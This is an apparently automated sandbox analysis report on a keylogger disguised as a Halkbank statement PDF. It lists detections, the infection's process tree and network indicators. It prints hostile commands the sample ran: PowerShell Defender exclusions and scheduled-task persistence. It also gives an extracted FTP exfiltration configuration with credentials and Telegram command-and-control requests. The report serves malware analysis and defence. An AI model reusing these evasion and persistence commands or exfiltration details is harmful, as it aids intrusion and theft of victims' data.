Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Halkbank Ekstre.pdf.exe

Overview

General Information

Sample name:Halkbank Ekstre.pdf.exe
Analysis ID:1596082
MD5:843f8757da04e0c033d219e17ca2109d
SHA1:9931f04fba177026099278dc26464d4208ac4d59
SHA256:1fa03ffa990685dcc676b8706fd5ef7246de2c18b97c14d882ee25b0d130955e
Tags:exegeoHalkbankTURuser-abuse_ch
Infos:

Detection

ReverseShell, Snake Keylogger, VIP Keylogger
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
Sigma detected: Suspicious Double Extension File Execution
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected ReverseShell
Yara detected Snake Keylogger
Yara detected Telegram RAT
Yara detected VIP Keylogger
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Connects to many ports of the same IP (likely port scanning)
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses an obfuscated file name to hide its real file extension (double extension)
Uses schtasks.exe or at.exe to add and modify task schedules
Uses the Telegram API (likely for C&C communication)
Yara detected Generic Downloader
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses FTP
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • Halkbank Ekstre.pdf.exe (PID: 1956 cmdline: "C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe" MD5: 843F8757DA04E0C033D219E17CA2109D)
    • powershell.exe (PID: 1244 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 6832 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 1876 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 2988 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 2836 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • schtasks.exe (PID: 1544 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\uAHDaCgpWpsogA" /XML "C:\Users\user\AppData\Local\Temp\tmp9D32.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 1824 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • Halkbank Ekstre.pdf.exe (PID: 2192 cmdline: "C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe" MD5: 843F8757DA04E0C033D219E17CA2109D)
  • uAHDaCgpWpsogA.exe (PID: 2876 cmdline: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe MD5: 843F8757DA04E0C033D219E17CA2109D)
    • schtasks.exe (PID: 1824 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\uAHDaCgpWpsogA" /XML "C:\Users\user\AppData\Local\Temp\tmpC694.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 1544 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • uAHDaCgpWpsogA.exe (PID: 1080 cmdline: "C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe" MD5: 843F8757DA04E0C033D219E17CA2109D)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
404 Keylogger, Snake KeyloggerSnake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger
{"Exfil Mode": "FTP", "Username": "anonymous_log@kashmirestore.com", "Password": "c%P+6,(]YFvP", "FTP Server": "ftp://kashmirestore.com/"}
SourceRuleDescriptionAuthorStrings
00000009.00000002.2615770776.00000000034C4000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_VIPKeyloggerYara detected VIP KeyloggerJoe Security
    00000009.00000002.2615770776.0000000003371000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
      00000009.00000002.2615770776.0000000003478000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        00000011.00000002.2615043055.0000000003221000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
          00000009.00000002.2597991445.000000000042F000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_ReverseShellYara detected ReverseShellJoe Security
            Click to see the 25 entries
            SourceRuleDescriptionAuthorStrings
            0.2.Halkbank Ekstre.pdf.exe.43a8e98.1.unpackJoeSecurity_ReverseShellYara detected ReverseShellJoe Security
              0.2.Halkbank Ekstre.pdf.exe.43a8e98.1.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                0.2.Halkbank Ekstre.pdf.exe.43a8e98.1.unpackJoeSecurity_VIPKeyloggerYara detected VIP KeyloggerJoe Security
                  0.2.Halkbank Ekstre.pdf.exe.43a8e98.1.unpackJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
                    0.2.Halkbank Ekstre.pdf.exe.43a8e98.1.unpackWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
                    • 0x2c1df:$a1: get_encryptedPassword
                    • 0x2c4fc:$a2: get_encryptedUsername
                    • 0x2bfef:$a3: get_timePasswordChanged
                    • 0x2c0f8:$a4: get_passwordField
                    • 0x2c1f5:$a5: set_encryptedPassword
                    • 0x2d8ce:$a7: get_logins
                    • 0x2d831:$a10: KeyLoggerEventArgs
                    • 0x2d496:$a11: KeyLoggerEventArgsEventHandler
                    Click to see the 31 entries

                    System Summary

                    barindex
                    Source: Process startedAuthor: Florian Roth (Nextron Systems), @blu3_team (idea), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe", CommandLine: "C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe", CommandLine|base64offset|contains: , Image: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe, NewProcessName: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe, OriginalFileName: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 3504, ProcessCommandLine: "C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe", ProcessId: 1956, ProcessName: Halkbank Ekstre.pdf.exe
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe", ParentImage: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe, ParentProcessId: 1956, ParentProcessName: Halkbank Ekstre.pdf.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe", ProcessId: 1244, ProcessName: powershell.exe
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe", ParentImage: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe, ParentProcessId: 1956, ParentProcessName: Halkbank Ekstre.pdf.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe", ProcessId: 1244, ProcessName: powershell.exe
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\uAHDaCgpWpsogA" /XML "C:\Users\user\AppData\Local\Temp\tmpC694.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\uAHDaCgpWpsogA" /XML "C:\Users\user\AppData\Local\Temp\tmpC694.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe, ParentImage: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe, ParentProcessId: 2876, ParentProcessName: uAHDaCgpWpsogA.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\uAHDaCgpWpsogA" /XML "C:\Users\user\AppData\Local\Temp\tmpC694.tmp", ProcessId: 1824, ProcessName: schtasks.exe
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\uAHDaCgpWpsogA" /XML "C:\Users\user\AppData\Local\Temp\tmp9D32.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\uAHDaCgpWpsogA" /XML "C:\Users\user\AppData\Local\Temp\tmp9D32.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe", ParentImage: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe, ParentProcessId: 1956, ParentProcessName: Halkbank Ekstre.pdf.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\uAHDaCgpWpsogA" /XML "C:\Users\user\AppData\Local\Temp\tmp9D32.tmp", ProcessId: 1544, ProcessName: schtasks.exe
                    Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe", ParentImage: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe, ParentProcessId: 1956, ParentProcessName: Halkbank Ekstre.pdf.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe", ProcessId: 1244, ProcessName: powershell.exe

                    Persistence and Installation Behavior

                    barindex
                    Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\uAHDaCgpWpsogA" /XML "C:\Users\user\AppData\Local\Temp\tmp9D32.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\uAHDaCgpWpsogA" /XML "C:\Users\user\AppData\Local\Temp\tmp9D32.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe", ParentImage: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe, ParentProcessId: 1956, ParentProcessName: Halkbank Ekstre.pdf.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\uAHDaCgpWpsogA" /XML "C:\Users\user\AppData\Local\Temp\tmp9D32.tmp", ProcessId: 1544, ProcessName: schtasks.exe
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2025-01-21T16:44:14.255377+010028033053Unknown Traffic192.168.2.949782104.21.112.1443TCP
                    2025-01-21T16:44:17.408666+010028033053Unknown Traffic192.168.2.949802104.21.112.1443TCP
                    2025-01-21T16:44:21.317757+010028033053Unknown Traffic192.168.2.949826104.21.112.1443TCP
                    2025-01-21T16:44:22.549675+010028033053Unknown Traffic192.168.2.949837104.21.112.1443TCP
                    2025-01-21T16:44:23.747814+010028033053Unknown Traffic192.168.2.949844104.21.112.1443TCP
                    2025-01-21T16:44:23.886130+010028033053Unknown Traffic192.168.2.949849104.21.112.1443TCP
                    2025-01-21T16:44:25.084406+010028033053Unknown Traffic192.168.2.949856104.21.112.1443TCP
                    2025-01-21T16:44:27.547769+010028033053Unknown Traffic192.168.2.949872104.21.112.1443TCP
                    2025-01-21T16:44:28.778531+010028033053Unknown Traffic192.168.2.949880104.21.112.1443TCP
                    2025-01-21T16:44:29.979020+010028033053Unknown Traffic192.168.2.949889104.21.112.1443TCP
                    2025-01-21T16:44:31.201643+010028033053Unknown Traffic192.168.2.949900104.21.112.1443TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2025-01-21T16:44:12.488269+010028032742Potentially Bad Traffic192.168.2.949772158.101.44.24280TCP
                    2025-01-21T16:44:13.691109+010028032742Potentially Bad Traffic192.168.2.949772158.101.44.24280TCP
                    2025-01-21T16:44:15.441125+010028032742Potentially Bad Traffic192.168.2.949787158.101.44.24280TCP
                    2025-01-21T16:44:22.488007+010028032742Potentially Bad Traffic192.168.2.949832158.101.44.24280TCP
                    2025-01-21T16:44:23.347357+010028032742Potentially Bad Traffic192.168.2.949832158.101.44.24280TCP
                    2025-01-21T16:44:24.506127+010028032742Potentially Bad Traffic192.168.2.949851158.101.44.24280TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2025-01-21T16:43:58.019232+010028455321Malware Command and Control Activity Detected192.168.2.949960119.18.54.3921TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2025-01-21T16:44:24.711681+010018100071Potentially Bad Traffic192.168.2.949850149.154.167.220443TCP
                    2025-01-21T16:44:33.303746+010018100071Potentially Bad Traffic192.168.2.949915149.154.167.220443TCP

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Source: 0.2.Halkbank Ekstre.pdf.exe.43a8e98.1.unpackMalware Configuration Extractor: VIP Keylogger {"Exfil Mode": "FTP", "Username": "anonymous_log@kashmirestore.com", "Password": "c%P+6,(]YFvP", "FTP Server": "ftp://kashmirestore.com/"}
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeReversingLabs: Detection: 36%
                    Source: Halkbank Ekstre.pdf.exeVirustotal: Detection: 38%Perma Link
                    Source: Halkbank Ekstre.pdf.exeReversingLabs: Detection: 36%
                    Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeJoe Sandbox ML: detected
                    Source: Halkbank Ekstre.pdf.exeJoe Sandbox ML: detected

                    Location Tracking

                    barindex
                    Source: unknownDNS query: name: reallyfreegeoip.org
                    Source: Halkbank Ekstre.pdf.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: unknownHTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.9:49777 version: TLS 1.0
                    Source: unknownHTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.9:49839 version: TLS 1.0
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.9:49850 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.9:49915 version: TLS 1.2
                    Source: Halkbank Ekstre.pdf.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: Binary string: srmB.pdb source: Halkbank Ekstre.pdf.exe, uAHDaCgpWpsogA.exe.0.dr
                    Source: Binary string: srmB.pdbSHA256 source: Halkbank Ekstre.pdf.exe, uAHDaCgpWpsogA.exe.0.dr
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeCode function: 4x nop then jmp 017BF45Dh9_2_017BF2C0
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeCode function: 4x nop then jmp 017BF45Dh9_2_017BF52F
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeCode function: 4x nop then jmp 017BF45Dh9_2_017BF4AC
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeCode function: 4x nop then jmp 017BFC19h9_2_017BF961
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeCode function: 4x nop then jmp 06FF31E0h9_2_06FF2DC8
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeCode function: 4x nop then jmp 06FF0D0Dh9_2_06FF0B30
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeCode function: 4x nop then jmp 06FF1697h9_2_06FF0B30
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeCode function: 4x nop then jmp 06FF2C19h9_2_06FF2968
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeCode function: 4x nop then jmp 06FFE959h9_2_06FFE6B0
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h9_2_06FF0673
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeCode function: 4x nop then jmp 06FFE0A9h9_2_06FFDE00
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeCode function: 4x nop then jmp 06FFF209h9_2_06FFEF60
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeCode function: 4x nop then jmp 06FFCF49h9_2_06FFCCA0
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeCode function: 4x nop then jmp 06FF31E0h9_2_06FF2DC2
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeCode function: 4x nop then jmp 06FFD7F9h9_2_06FFD550
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeCode function: 4x nop then jmp 06FFE501h9_2_06FFE258
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeCode function: 4x nop then jmp 06FFF661h9_2_06FFF3B8
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeCode function: 4x nop then jmp 06FFEDB1h9_2_06FFEB08
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeCode function: 4x nop then jmp 06FFD3A1h9_2_06FFD0F8
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h9_2_06FF0853
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h9_2_06FF0040
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeCode function: 4x nop then jmp 06FFFAB9h9_2_06FFF810
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeCode function: 4x nop then jmp 06FFDC51h9_2_06FFD9A8
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeCode function: 4x nop then jmp 06FF31E0h9_2_06FF310E
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeCode function: 4x nop then jmp 076AA4DEh10_2_076A9B4A
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeCode function: 4x nop then jmp 017DF45Dh17_2_017DF2C0
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeCode function: 4x nop then jmp 017DF45Dh17_2_017DF52F
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeCode function: 4x nop then jmp 017DF45Dh17_2_017DF4AC
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeCode function: 4x nop then jmp 017DFC19h17_2_017DF961

                    Networking

                    barindex
                    Source: Network trafficSuricata IDS: 2845532 - Severity 1 - ETPRO MALWARE Snake Keylogger Exfil via FTP M1 : 192.168.2.9:49960 -> 119.18.54.39:21
                    Source: Network trafficSuricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.9:49850 -> 149.154.167.220:443
                    Source: Network trafficSuricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.9:49915 -> 149.154.167.220:443
                    Source: global trafficTCP traffic: 119.18.54.39 ports 39440,36695,1,2,35453,21
                    Source: unknownDNS query: name: api.telegram.org
                    Source: Yara matchFile source: 0.2.Halkbank Ekstre.pdf.exe.4320e78.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Halkbank Ekstre.pdf.exe.43a8e98.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Halkbank Ekstre.pdf.exe.4298e58.3.raw.unpack, type: UNPACKEDPE
                    Source: global trafficTCP traffic: 192.168.2.9:49939 -> 119.18.54.39:36695
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                    Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:855271%0D%0ADate%20and%20Time:%2021/01/2025%20/%2022:28:57%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20855271%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:855271%0D%0ADate%20and%20Time:%2021/01/2025%20/%2022:09:51%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20855271%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                    Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
                    Source: Joe Sandbox ViewIP Address: 104.21.112.1 104.21.112.1
                    Source: Joe Sandbox ViewIP Address: 104.21.112.1 104.21.112.1
                    Source: Joe Sandbox ViewIP Address: 119.18.54.39 119.18.54.39
                    Source: Joe Sandbox ViewASN Name: PUBLIC-DOMAIN-REGISTRYUS PUBLIC-DOMAIN-REGISTRYUS
                    Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
                    Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                    Source: unknownDNS query: name: checkip.dyndns.org
                    Source: unknownDNS query: name: reallyfreegeoip.org
                    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.9:49832 -> 158.101.44.242:80
                    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.9:49787 -> 158.101.44.242:80
                    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.9:49772 -> 158.101.44.242:80
                    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.9:49851 -> 158.101.44.242:80
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:49802 -> 104.21.112.1:443
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:49844 -> 104.21.112.1:443
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:49837 -> 104.21.112.1:443
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:49826 -> 104.21.112.1:443
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:49782 -> 104.21.112.1:443
